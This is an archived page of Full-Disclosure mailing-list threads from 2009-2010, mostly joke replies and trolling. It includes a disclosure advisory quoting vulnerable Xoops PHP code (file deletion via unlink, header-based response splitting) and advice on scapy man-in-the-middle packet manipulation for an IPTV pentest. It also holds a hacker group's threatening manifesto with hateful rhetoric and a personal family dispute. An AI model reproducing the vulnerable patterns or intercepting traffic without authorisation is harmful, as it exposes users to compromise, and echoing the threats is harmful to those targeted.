>> >>> 
>> >>> From: full-disclosure-boun...@lists.grok.org.uk
>> >>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> edgar deal
>> >>> Sent: 13. februar 2010 16:18
>> >>> To: 751 ...?
>> >>> Cc: full-disclosure@lists.grok.org.uk
>> >>> Subject: Re: [Full-disclosure] (no subject)
>> >>>
>> >>> incorrect.
>> >>>
>> >>> On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com>
>> wrote:
>> >>>>
>> >>>> ___
>> >>>> Full-Disclosure - We believe in it.
>> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>>
>> >>>
>> >>> ___
>> >>> Full-Disclosure - We believe in it.
>> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2010-02-16 Thread Tomas L. Byrnes
Sorry for the Inconvenience.



> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
> disclosure-boun...@lists.grok.org.uk] On Behalf Of gold flake
> Sent: Tuesday, February 16, 2010 9:16 PM
> To: Christian Sciberras
> Cc: 751 ...?; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] (no subject)
> 
> No it is still 42 and will always be
> 
> On Mon, Feb 15, 2010 at 3:56 PM, Christian Sciberras
>  wrote:
> > That's old news!
> >
> > It's been upgraded to 239!
> >
> >
> >
> > On Mon, Feb 15, 2010 at 11:25 AM, Anders Klixbull 
> wrote:
> >>
> >> you obviously misunderstood since every geek on the planet knows
> that the
> >> answer in numeric form is 42!
> >>
> >>
> >> 
> >> From: Christian Sciberras [mailto:uuf6...@gmail.com]
> >> Sent: 15. februar 2010 11:15
> >> To: Anders Klixbull
> >> Cc: edgar deal; 751 ...?; full-disclosure@lists.grok.org.uk
> >> Subject: Re: [Full-disclosure] (no subject)
> >>
> >> Actually, the correct answer is 239.
> >> The full question to the answer (and sum) is left up to the read.
> >>
> >> On Mon, Feb 15, 2010 at 11:07 AM, Anders Klixbull 
> wrote:
> >>>
> >>> yes the correct answer is 'cheese'
> >>>
> >>>
> >>> ____
> >>> From: full-disclosure-boun...@lists.grok.org.uk
> >>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
> edgar deal
> >>> Sent: 13. februar 2010 16:18
> >>> To: 751 ...?
> >>> Cc: full-disclosure@lists.grok.org.uk
> >>> Subject: Re: [Full-disclosure] (no subject)
> >>>
> >>> incorrect.
> >>>
> >>> On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com>
> wrote:
> >>>>
> >>>> ___
> >>>> Full-Disclosure - We believe in it.
> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>>> Hosted and sponsored by Secunia - http://secunia.com/
> >>>
> >>>
> >>> ___
> >>> Full-Disclosure - We believe in it.
> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2010-02-16 Thread gold flake
No it is still 42 and will always be

On Mon, Feb 15, 2010 at 3:56 PM, Christian Sciberras  wrote:
> That's old news!
>
> It's been upgraded to 239!
>
>
>
> On Mon, Feb 15, 2010 at 11:25 AM, Anders Klixbull  wrote:
>>
>> you obviously misunderstood since every geek on the planet knows that the
>> answer in numeric form is 42!
>>
>>
>> 
>> From: Christian Sciberras [mailto:uuf6...@gmail.com]
>> Sent: 15. februar 2010 11:15
>> To: Anders Klixbull
>> Cc: edgar deal; 751 ...?; full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] (no subject)
>>
>> Actually, the correct answer is 239.
>> The full question to the answer (and sum) is left up to the read.
>>
>> On Mon, Feb 15, 2010 at 11:07 AM, Anders Klixbull  wrote:
>>>
>>> yes the correct answer is 'cheese'
>>>
>>>
>>> 
>>> From: full-disclosure-boun...@lists.grok.org.uk
>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of edgar deal
>>> Sent: 13. februar 2010 16:18
>>> To: 751 ...?
>>> Cc: full-disclosure@lists.grok.org.uk
>>> Subject: Re: [Full-disclosure] (no subject)
>>>
>>> incorrect.
>>>
>>> On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com> wrote:
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2010-02-15 Thread Christian Sciberras
That's old news!

It's been upgraded to 239!



On Mon, Feb 15, 2010 at 11:25 AM, Anders Klixbull  wrote:

>  you obviously misunderstood since every geek on the planet knows that the
> answer in numeric form is 42!
>
>
>
>  --
> *From:* Christian Sciberras [mailto:uuf6...@gmail.com]
> *Sent:* 15. februar 2010 11:15
> *To:* Anders Klixbull
> *Cc:* edgar deal; 751 ...?; full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] (no subject)
>
> Actually, the correct answer is 239.
> The full question to the answer (and sum) is left up to the read.
>
> On Mon, Feb 15, 2010 at 11:07 AM, Anders Klixbull  wrote:
>
>>  yes the correct answer is 'cheese'
>>
>>
>>
>>  --
>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *edgar deal
>> *Sent:* 13. februar 2010 16:18
>> *To:* 751 ...?
>> *Cc:* full-disclosure@lists.grok.org.uk
>> *Subject:* Re: [Full-disclosure] (no subject)
>>
>> incorrect.
>>
>> On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com> wrote:
>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2010-02-15 Thread Anders Klixbull
you obviously misunderstood since every geek on the planet knows that
the answer in numeric form is 42!
 
 



From: Christian Sciberras [mailto:uuf6...@gmail.com] 
Sent: 15. februar 2010 11:15
To: Anders Klixbull
Cc: edgar deal; 751 ...?; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)


Actually, the correct answer is 239.
The full question to the answer (and sum) is left up to the read.


On Mon, Feb 15, 2010 at 11:07 AM, Anders Klixbull 
wrote:


yes the correct answer is 'cheese'
 

 



From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of edgar
deal
Sent: 13. februar 2010 16:18
To: 751 ...?
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)


incorrect.


On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com>
wrote:



___
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2010-02-15 Thread Christian Sciberras
Actually, the correct answer is 239.
The full question to the answer (and sum) is left up to the read.

On Mon, Feb 15, 2010 at 11:07 AM, Anders Klixbull  wrote:

>  yes the correct answer is 'cheese'
>
>
>
>  --
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *edgar deal
> *Sent:* 13. februar 2010 16:18
> *To:* 751 ...?
> *Cc:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] (no subject)
>
> incorrect.
>
> On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com> wrote:
>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2010-02-15 Thread Anders Klixbull
yes the correct answer is 'cheese'
 
 



From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of edgar
deal
Sent: 13. februar 2010 16:18
To: 751 ...?
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)


incorrect.


On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com> wrote:



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2010-02-13 Thread McGhee, Eddie
Correct!


From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of edgar deal
Sent: 13 February 2010 15:18
To: 751 ...?
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)

incorrect.

On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? 
<751hack...@gmail.com<mailto:751hack...@gmail.com>> wrote:

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2010-02-13 Thread edgar deal
incorrect.

On Sat, Feb 13, 2010 at 1:09 AM, 751 ...? <751hack...@gmail.com> wrote:

>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2010-02-12 Thread 751 ...?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2010-01-18 Thread CodeScan Labs Advisories


= CodeScan Advisory, codescan.com 
=
= Multiple vulnerablities in Xoops 2.4.3
=
= Vendor Website:
= http://www.xoops.org
=
= Affected Version:
=Xoops 2.4.3 And Earlier
=
= Researched By
=CodeScan Labs 
=
= Public disclosure on January 19th, 2010


== Overview ==

CodeScan Labs (www.codescan.com), has recently released a new source
code scanning tool, CodeScan. CodeScan is an advanced auditing tool
designed to check web application source code for security vulnerabilities.
CodeScan utilises an intelligent source code parsing engine, traversing
execution paths and tracking the flow of user supplied input.

During the ongoing testing of CodeScan ASP, Xoops was selected as one of 
the test applications. We downloaded Xoops from the Xoops website 
http://sourceforge.net/projects/xoops/files/XOOPS Core (stable releases)/XOOPS 
2.4.3/.

This advisory is the result of research into the security of Xoops,
based on the report generated by the CodeScan tool.

== Vulnerability Details ==

* File Deletion through unlink *

The unlink function is used by a web page to delete a file on the web server.
The unlink function was found to be used with user input:

unlink($oldsmile_path);

Although the filter functions like str_replace are used:

$oldsmile_path = str_replace("\\", "/", 
realpath(XOOPS_UPLOAD_PATH.'/'.trim($_POST['old_smile'])));

It is not a strong enough for CodeScan Developer to count it as a filter.
It is potentially dangerous for user to have direct input of what to delete, 
dependent on the access and permission the user holds.  It is recommended 
that user permissions and access are constrained to prevent exploitation.

* HTTP Response Splitting via Header *

Codescan Developer has identified that the application header has the 
$redirect variable involved with a user input with no validators or 
restrictions, or custom filters function.

$redirect = trim($_GET['xoops_redirect']);
and:
header('Location: ' . $redirect);

It is potentially dangerous at this point where a malicious user could inject 
malicious codes into the header; next time a user accesses the page, can 
cause it to execute that malicious code.

== Credit ==

Discovered and advised to the vendor by CodeScan Labs

== About CodeScan Labs Ltd ==

CodeScan Labs is a specialist security research and development
organisation, that has developed the cornerstone application, CodeScan.
CodeScan Labs helps organisations secure their web services through the
automated scanning of the web application source code for security
vulnerabilities.  The CodeScan product is currently available for ASP, 
ASP.NET and PHP.

CodeScan Labs operates with Responsible Disclosure. As a result,
any published advisories will contain information around problems
identified by CodeScan, that have been resolved by the vendor.Additional
code problems which may be identified by CodeScan or its staff which are
not resolved by the vendor will not be made publicly available.

-- 
This message has been scanned for viruses and
dangerous content by Bizo EmailFilter, and is
believed to be clean.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2009-12-23 Thread mixed ya

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-12-17 Thread Jeff Blaum
Wow, is you're site still down Dan? 

"Dan Kaminsky"  wrote:

> Easily the best environment for packet manipulation is scapy.
>
> The most guaranteed to work approach involves putting a system with two
> interfaces in as an attacker, and running two scapy processes that copy
frames
> received on one interface onto the other one.  Of course, your copier
parses
> the frames, changes what needs to be changed, fixes up checksums, etc.
>
> There are other approaches that are preferable for all sorts of reasons,
but
> the above means you don't need to fight with ARP or addresses or firewall
> rules or the kernel.  (Proxy ARP, mangle tables, yadda yadda yadda.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-12-16 Thread Dan Kaminsky
Easily the best environment for packet manipulation is scapy.

The most guaranteed to work approach involves putting a system with two
interfaces in as an attacker, and running two scapy processes that copy
frames received on one interface onto the other one.  Of course, your copier
parses the frames, changes what needs to be changed, fixes up checksums,
etc.

There are other approaches that are preferable for all sorts of reasons, but
the above means you don't need to fight with ARP or addresses or firewall
rules or the kernel.  (Proxy ARP, mangle tables, yadda yadda yadda.)

2009/12/16 김무성 

>  Hello. List.
>
>
>
> I'm pentesting IPTV.
>
>
>
> Our IPTV network structure is this.
>
>
>
> Monitor - IPTV - VDSL modem - ISP
>
>
>
> So, for packet manipulation
>
> I have to ARP spoofing or change network structure
>
>
>
> Monitor - IPTV - attacker - VDSL modem - ISP
>
>
>
> But, I don't know IPTV SetupBox(STB)'s netmask and gateway address.
>
> So I wanna make this network
>
>
>
> Monitor - IPTV - attacker - VDSL modem - ISP
>
>
>
> Attacker is a computer.
>
> This computer have two NIC.
>
> Two NIC only transmit and receive packet. They have no IP address.
>
> I wanna manipulate this packet's field
>
>
>
> Do you know how make this network?
>
> Do you know tools that manipulate every packet (http, rstp, igmp, etc,.)?
>
>
>
> Thanks
>
> KIM
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-12-16 Thread 김무성
Hello. List.

 

I’m pentesting IPTV.

 

Our IPTV network structure is this.

 

Monitor - IPTV - VDSL modem - ISP

 

So, for packet manipulation

I have to ARP spoofing or change network structure 

 

Monitor - IPTV - attacker - VDSL modem - ISP

 

But, I don’t know IPTV SetupBox(STB)’s netmask and gateway address.

So I wanna make this network

 

Monitor - IPTV - attacker - VDSL modem - ISP

 

Attacker is a computer.

This computer have two NIC.

Two NIC only transmit and receive packet. They have no IP address.

I wanna manipulate this packet’s field

 

Do you know how make this network?

Do you know tools that manipulate every packet (http, rstp, igmp, etc,.)?

 

Thanks

KIM

 

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer

2009-10-05 Thread TheLearner
Sorry about leaving sealpac in there, we're working on correcting 
that. I'll put a notice in the next one.

For the record, the post made in an earlier version of Andrew 
Auernheimer's infodoc states weev has an affiliation with sealpac. 
This is incorrect because weev just took the domain name and failed 
to give it back.

Since you find is necessary to forward this correspondence to the 
FBI, I'll make it public here for you.

It's almost like you're fishing to be a victim or something. It's 
pathetic.

If it means anything: No one has made any threats to you. No one is 
going to harm you. No one has any ill-sentiment towards your family.

You've been done a favor by having your relationship with weev 
clarified on here.

You got your correction, you got your post down, quit being 
melodramatic.

On Mon, 05 Oct 2009 07:50:20 + Alyse Auernheimer 
 wrote:
Return-Path: 
Received: from smtp7.hushmail.com (smtp7.hushmail.com 
[65.39.178.136])
 by imap12.hushmail.com (Cyrus v2.3.7-Invoca-RPM-2.3.7-2.el5) with 
LMTPA;
 Mon, 05 Oct 2009 07:50:29 +
X-Sieve: CMU Sieve 2.3
Received: from mail-ew0-f224.google.com (mail-ew0-f224.google.com 
[209.85.219.224])
by smtp7.hushmail.com (Postfix) with ESMTP
for ; Mon,  5 Oct 2009 07:50:21 + (UTC)
Received: by ewy24 with SMTP id 24so11122764ewy.22
for ; Mon, 05 Oct 2009 00:50:21 -0700 
(PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:received:date:message-
id:subject
 :from:to:content-type;
bh=O+UD/WD8lCH2KA1S8ZiYbDmjoHo36/uRUHWULElbv7c=;

b=N9iZNiKyHiM6Sso//SeBju/siqip/Kl3QGZ1kBFI6HY0Npx0TU4suw4PixASzY5EdO
 
Mfq8Gc6SEQAaPBmtRv+EPoCENWkaKMg21oRkzgaCwZ90QFnfu7K/H4mfuZHkXehS9irP
 XL273nm8NSog6o7XfyATtsN+2TVdFvwYC6B0w=
DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:date:message-id:subject:from:to:content-type;

b=HfCFSLplV0dZpvp5Pmk5aqBRGbsW4KwixRJ0KmZHItZhIJkeVGLWeHMPqyBtE3nkg5
 
4XlDiotqE/V0398MMiRyzreqiHrufXjkTdzAYnK1KBHA1pBje2dtlM6l/ICwS+fuLiLt
 9HubIoKXLS126A9FQOYCxML9lQ1qG/DdROv8I=
MIME-Version: 1.0
Received: by 10.216.87.144 with SMTP id 
y16mr622378wee.95.1254729020908; Mon, 
05 Oct 2009 00:50:20 -0700 (PDT)
Date: Mon, 5 Oct 2009 03:50:20 -0400
Message-ID: 
<4f8170520910050050v1d44b4d8p6ad4202ac4dc5...@mail.gmail.com>
Subject: 
From: Alyse Auernheimer 
To: TheLearner 
Content-Type: multipart/alternative; 
boundary=0016e6d7852e94a5d104752b5dda

Lisa,
Please do not link Andrew Auernheimer with our business, Sealpac 
USA, he has
nothing to do with it except he is holding our domain name hostage. 
We are
planning on pursuing a court order to have it released. All of our 
emails
concerning this subject will now be forwarded to the FBI as it may
potentially impact our business. The individuals who say they are 
trying to
help us are now causing more harm to us than Andrew himself. We are 
advised
to have our home watched by law enforcement and our daughter's 
dorm. This is
just wrong.

Thank You for you consideration.
Alyse

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] No subject

2009-09-19 Thread full-censorship
how do we know you're not part of the n3td3v secret society?

http://en.wikipedia.org/wiki/Secret_society

Gichuki John Chuksjonia  wrote:

Just saw that. Thot were new trolls by n3td3v pouring all the 
way to twitter.


The Security Community  wrote:
> Someone evidently hacked into n3td3v's Twiiter account and is 
spewing
> nonsense.
>
> http://twitter.com/n3td3v
>
> Maybe it's some sort of botnet C&C account now, I dunno.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2009-08-27 Thread rahul nagpal
hi


  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-08-27 Thread rahul nagpal
hi


  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-08-03 Thread Robert H
General Disarray begin the flooding of the FD mailing list.

anti sec wrote:
> We, the worldwide anti-sec movement have landed yet another coup that 
> will strike full-disclosurizers into the very hearts and soul of their 
> being.
>
> Fellow anti-sec'ers and freedom-lovers: Rejoice, for it is time to 
> take revenge against the full disclosure zionist hegemony in 
> retaliation for the damage white hats  have been committing against 
> the security world. Our heroic anti-sec warriors have carried out a 
> blessed raid against 4chanarchive.org. 4chan users are now burning 
> with fear, terror and panic on their /b/, /gif/, /r9k/, and /a/ boards.
>
> The white hat world will soon be asunder and the enemies will flee 
> from our holy power!
>
> We have repeatedly warned the security industry and the people in it. 
> DO NOT FUCK WITH ANTI-SEC! Statistically speaking, every white hat is 
> using 4chan or at least has heard of it. Thus we struck into the very 
> core of their existence. We have fulfilled our promise and carried out 
> our blessed hacking attack on 4chanarchive after our warriors exerted 
> strenuous efforts over a long period of time to ensure the success of 
> the attack.
>
> We continue to warn the websites of governmentsecurity and hackforums 
> and all full disclosure public as a whole that they will be punished 
> in the same way if they do not withdraw from their erroneous ways of 
> living and see that white hats are the scum of the earth. Those who 
> warn are excused.
>
> The list will be released at the usual places. those in the know do 
> realize where that is.
>
> ANTI-SEC FOR LIFE!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-31 Thread Anonymous email
I prefer that crap many more:
http://www.voltairenet.org/en

¤¤
> Sounds much like a marketing operations

> http://www.pbs.org/wgbh/nova/spyfactory/

> -naif
> http://infosecurity.ch






This anonymous email message was sent from: 
http://CyberAtlantis.com/anonymous_email.php

Sorry, as our system is 100% ANONYMOUS we cannot assist you in tracking down 
the 
sender as we have NEITHER IP NOR email content of any of the emails sent.

If you are being harrassed by someone abusing this service then 
you may add your email address to our database of blocked email addresses.
http://CyberAtlantis.com/add_banned.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-07-23 Thread YEHG Group

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-22 Thread Ed Carp
That's what keeps me subscribed - when I've had a particularly bad day, I
always know I can come over here and have a great laugh!

2009/7/21 Rob Fuller 

I'm sorry, log time reader of FD, it's a great mashup of hilarity and vuln
> disclosure.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-22 Thread Ed Carp
Exactly!

2009/7/21 Josh Wheeler 

> Anti-Sec
>
> We will pwn your pr0n.
>
> This is beginning to seem more and more like an exercise in
> circle-jerking...
>
> On Tue, Jul 21, 2009 at 5:39 PM, Ed Carp  wrote:
>
>> Do not fuck with anti-suck.  LOL!
>>
>>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-22 Thread Dean Pierce
Won't somebody PLEASE think of the CHILDREN!!?!

On Wed, Jul 22, 2009 at 10:50 AM, Dean Pierce wrote:
> Won't somebody PLEASE thing of the CHILDREN!!?!
>
> On Wed, Jul 22, 2009 at 9:52 AM, Ferdinand Klinzer wrote:
>> lol @white hats
>>
>> Cheers
>>
>>
>> Am 22.07.2009 um 14:00 schrieb wishi:
>>
>>> Hmmh,
>>>
>>> I personally see a lack of defense and a need for more white hats, who
>>> aren't constantly trying to gain media attention by breaking stuff. -
>>> Because most stuff is already broken - as we see. Even trolls nowadays
>>> can course some damage.
>>> If you need a good example to proof that we need new security
>>> concepts,
>>> look at what even idiots can do. And sell this as a good argument, for
>>> sure!! ;) My 5 year old niece could have hacked this 4chan site.
>>>
>>> I'm still waiting for this so called ssh thingy. Hack something real:
>>> release an OpenSSH patch.
>>>
>>>
>>> Have fun,
>>> wishi
>>>
>>>
>>> Ed Carp schrieb:
 Do not fuck with anti-suck.  LOL!


 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-22 Thread Ferdinand Klinzer
lol @white hats

Cheers


Am 22.07.2009 um 14:00 schrieb wishi:

> Hmmh,
>
> I personally see a lack of defense and a need for more white hats, who
> aren't constantly trying to gain media attention by breaking stuff. -
> Because most stuff is already broken - as we see. Even trolls nowadays
> can course some damage.
> If you need a good example to proof that we need new security  
> concepts,
> look at what even idiots can do. And sell this as a good argument, for
> sure!! ;) My 5 year old niece could have hacked this 4chan site.
>
> I'm still waiting for this so called ssh thingy. Hack something real:
> release an OpenSSH patch.
>
>
> Have fun,
> wishi
>
>
> Ed Carp schrieb:
>> Do not fuck with anti-suck.  LOL!
>>
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-22 Thread Turgut Baumann
I think that some kind of nazi party would be a better deal, maybe 
someone of these guys understand this "revenge against the full 
disclosure zionist hegemony"-shit, because I don't - I'm just to stupid 
for demogagy.

valdis.kletni...@vt.edu schrieb:
> On Tue, 21 Jul 2009 20:27:38 CDT, anti sec said:
>> Our heroic anti-sec warriors have carried out a blessed raid against
>> 4chanarchive.org. 4chan users are now burning with fear, terror and panic
>> on their /b/, /gif/, /r9k/, and /a/ boards.
> 
> Great. Now you pissed off anon.  Why didn't you pick on something *safe*,
> like the NSA or the Russian crime syndicates?
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-22 Thread Chris Brandstetter
4chan, heart of the White Hat.  ROFLMAO.  OKay this is bloody funny.  Dude,
get a life.

On Wed, Jul 22, 2009 at 6:00 AM,
wrote:
